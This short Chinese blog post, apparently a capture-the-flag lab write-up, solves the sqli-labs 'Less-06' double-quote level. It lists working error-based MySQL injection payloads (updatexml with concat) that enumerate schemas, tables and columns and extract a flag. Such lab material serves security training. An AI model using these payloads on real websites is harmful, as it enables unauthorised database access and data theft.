Less-06
作者:互联网
双引号绕过
?id=1" order by 3--+
?id=1" and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata limit 0,1),0x7e),1)--+
?id=1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' limit 0,1),0x7e),1)--+
?id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag' limit 0,1),0x7e),1)--+
?id=1" and updatexml(1,concat(0x7e,(select group_concat(flag) from ctftraining.flag limit 0,1),0x7e),1)--+
标签:06,Less,0x7e,--+,updatexml,id,concat,schema 来源: https://blog.csdn.net/m0_62094846/article/details/122392694